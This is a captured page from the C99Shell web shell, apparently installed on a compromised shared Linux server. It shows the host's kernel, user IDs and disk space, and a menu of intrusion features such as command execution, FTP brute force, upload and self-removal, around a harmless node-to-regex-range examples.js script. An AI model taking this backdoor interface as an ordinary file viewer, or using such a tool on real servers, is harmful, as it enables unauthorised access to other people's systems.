!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.3.27 

uname -a: Linux pdx1-shared-a4-04 6.6.104-grsec-jammy+ #3 SMP Tue Sep 16 00:28:11 UTC 2025 x86_64 

uid=6659440(dh_z2jmpm) gid=2086089(pg10499364) groups=2086089(pg10499364)  

Safe-mode: OFF (not secure)

/usr/share/doc/node-to-regex-range/   drwxr-xr-x
Free 712.26 GB of 879.6 GB (80.98%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     examples.js (1.32 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
'use strict';

const toRegexRange = require('./');
const table = require('text-table');
const Time = require('time-diff');
const time = new Time();

/**
 * $ node examples.js
 */

const toRange = (min, max) => {
  let key = 'to-range' + min + max;
  time.start(key);

  return [
    '',
    `\`toRegexRange(${min}, ${max})\``,
    `\`${toRegexRange(min, max, { wrap: false }).split('|').join('\\|')}\``,
    `_${time.end(key)}_`,
    ''
  ];
};

toRange('1', '3');

let rows = [
  ['', '**Range**', '**Result**', '**Compile time**', ''],
  ['', '--- ', '--- ', '---', ''],
];

let examples = [
  ['-10', '10'],
  ['-100', '-10'],
  ['-100', '100'],

  ['001', '100'],
  ['001', '555'],
  ['0010', '1000'],

  ['1', '50'],
  ['1', '55'],
  ['1', '555'],
  ['1', '5555'],
  ['111', '555'],
  ['29', '51'],
  ['31', '877'],

  ['5', '5'],
  ['5', '6'],
  ['1', '2'],
  ['1', '5'],
  ['1', '10'],
  ['1', '100'],
  ['1', '1000'],
  ['1', '10000'],
  ['1', '100000'],
  ['1', '1000000'],
  ['1', '10000000'],
].forEach(args => {
  rows.push(toRange.apply(null, args));
});

let text = table(rows, { hsep: ' | ' });
console.log(text);

/**
 * This method is exposed as a helper, which is picked up
 * by verb and used in the .verb.md readme template
 */

module.exports = () => {
  return text.split('\n').map(line => line.replace(/^ +/, '')).join('\n');
};


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0097 ]--